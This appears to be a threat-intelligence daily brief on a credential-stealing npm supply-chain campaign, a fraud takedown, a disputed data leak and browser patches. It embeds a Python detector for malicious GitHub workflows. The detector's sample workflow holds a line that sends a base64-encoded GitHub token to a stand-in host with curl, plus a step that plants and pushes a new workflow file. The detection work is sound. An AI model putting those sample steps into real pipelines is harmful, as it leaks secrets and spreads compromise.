ZeroFox Daily Intelligence Brief - April 30, 2026
|by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Supply Chain Campaign “Mini Shai-Hulud” Compromises SAP npm Packages
- European Police Dismantle Major Crypto Investment Fraud Ring
- Threat Actor Claims Polymarket Data Leak; Platform Calls It Public Scraping
Supply Chain Campaign “Mini Shai-Hulud” Compromises SAP npm Packages
Source: https://thehackernews.com/2026/04/sap-npm-packages-compromised-by-mini.html
What we know: The supply chain attack campaign "Mini Shai-Hulud" is reportedly targeting SAP npm packages with credential-stealing malware. The campaign harvests GitHub tokens and cloud secrets, encrypting the stolen data with AES-256-GCM.
Context: The malicious SAP packages further self-propagate by injecting malicious GitHub Actions workflows into victim repositories. This is among the first supply chain attacks to target AI coding agent configurations for persistence and propagation.
Analyst note: The attack TTPs are consistent with TeamPCP, the threat actor behind multiple successful supply chain attacks including Shai-Hulud, Trivy, and the recent Bitwarden CLI compromise. Adversaries are likely to follow the same playbook, abusing AI automation to compromise developer ecosystems. The malicious GitHub workflows are also likely to infect thousands of downstream packages, leading to credential theft and lateral movement.
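As an added illustration (not part of the brief or of any vendor tooling), a heuristic audit of GitHub Actions workflow files for the two behaviours described above: a secret referenced in a step that also makes outbound requests or encodes data, and a step that writes and commits a new workflow file. The sample workflows, the host example.invalid and the regex patterns are constructed assumptions for this example, not published indicators.

```python
"""Heuristic review of workflow files for traits the brief describes.
The patterns below are this example's own assumptions, not campaign IoCs."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}")
OUTBOUND = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b")
ENCODE = re.compile(r"\b(base64|openssl\s+enc)\b")
WORKFLOW_PATH = re.compile(r"\.github/workflows/[^\s'\"]+\.ya?ml")
PLANT = re.compile(r"(>\s*\.github/workflows|\btee\s+\.github/workflows|\bgit\s+(add|commit|push)\b)")


@dataclass
class Finding:
    step: str
    reasons: List[str] = field(default_factory=list)


def split_steps(text: str) -> List[Tuple[str, str]]:
    """Crude, YAML-library-free split of a workflow into '- name:' blocks."""
    parts = re.split(r"(?m)^\s*-\s*name:\s*", text)
    steps = []
    for part in parts[1:]:
        name, _, body = part.partition("\n")
        steps.append((name.strip().strip('"'), body))
    return steps


def audit_workflow(text: str) -> List[Finding]:
    """Return one Finding per step that matches any heuristic."""
    findings = []
    for name, body in split_steps(text):
        reasons = []
        if SECRET_REF.search(body) and OUTBOUND.search(body):
            reasons.append("secret referenced in a step that makes outbound requests")
        if SECRET_REF.search(body) and ENCODE.search(body):
            reasons.append("secret referenced alongside an encoding/encryption command")
        if WORKFLOW_PATH.search(body) and PLANT.search(body):
            reasons.append("step writes or commits a workflow file (possible self-propagation)")
        if reasons:
            findings.append(Finding(name, reasons))
    return findings


# Constructed samples: a normal publish job and one showing the flagged traits.
BENIGN = """name: ci\non: [push]\njobs:\n  test:\n    steps:\n      - name: checkout\n        uses: actions/checkout@v4\n      - name: install\n        run: npm ci\n      - name: publish\n        run: npm publish\n        env:\n          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}\n"""
SUSPICIOUS = """name: ci\non: [push]\njobs:\n  build:\n    steps:\n      - name: checkout\n        uses: actions/checkout@v4\n      - name: cache warmup\n        run: |\n          echo "${{ secrets.GITHUB_TOKEN }}" | base64 | curl -s --data-binary @- https://example.invalid/c\n      - name: sync\n        run: |\n          cat > .github/workflows/sync.yml <<'EOF'\n          name: sync\n          EOF\n          git add .github/workflows/sync.yml && git commit -m sync && git push\n"""

if __name__ == "__main__":
    for wf in (BENIGN, SUSPICIOUS):
        print(audit_workflow(wf))
```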
European Police Dismantle Major Crypto Investment Fraud Ring
What we know: Law enforcement authorities have dismantled a 50 million euro crypto investment fraud operation. Ten suspects were arrested and three call centers were seized. Authorities also recovered 891,735 euros in cash and hundreds of digital devices for forensic examination.
Context: The scammers used call centers to deceive individuals into fraudulent cryptocurrency investments. Victims across Europe, Canada, and the UK were lured through fake investment platforms on social media, then manipulated by call center operators posing as brokers. Those who lost money were re-targeted with bogus fund recovery services requiring a cryptocurrency deposit.
Analyst note: Threat actors involved in scams like this are likely to decentralize their fraud operations using encrypted messaging and crypto mixing services. They are also likely to migrate to less regulated jurisdictions.
Threat Actor Claims Polymarket Data Leak; Platform Calls It Public Scraping
Source: https://hackread.com/polymarket-rejects-data-breach-hacker-records-stolen/
What we know: Threat actor “Xorcat” claimed to have breached Polymarket, the decentralized prediction market platform, and leaked 300,000 records via API flaws, but the company denied any breach. The company asserted that the incident is a scraping of publicly available blockchain and platform data rather than an actual compromise.
Context: Xorcat claimed to have leaked a 1 GB API dump from Polymarket on Telegram and the dark web forum DarkForums, containing about 10 million records, including user profiles (personal information, wallet addresses), comments, reports, and follower data. The actor also claimed to offer a proof-of-concept exploit kit for alleged Polymarket vulnerabilities, including an SSRF and an authorization flaw.
Analyst note: Even if this leaked information is publicly accessible, this organized dataset is likely to enable large-scale correlation of user identities with wallet activity, increasing risks of profiling, phishing, and targeted scams.
DEEP AND DARK WEB INTELLIGENCE
PwnForums user unico: Untested threat actor “unico” has advertised a 26 GB dataset containing about 73 million records from multiple crypto, Web3, and AI platforms on dark web forum PwnForums. The data, allegedly sourced from 46 databases, includes user records, email addresses, and admin accounts with password hashes.
VULNERABILITY AND EXPLOIT INTELLIGENCE
Chrome security patches: Chrome 147 was released with 30 security fixes, including four use-after-free vulnerabilities affecting components such as Canvas, iOS, Accessibility, and Views. Most of the patched issues are memory-safety and use-after-free bugs that could enable code execution or data exposure. These flaws are likely to enable attackers to execute arbitrary code on a victim’s system, potentially leading to full device compromise.
Affected products: The affected products are included in this advisory.
Tags: DIB, tlp:green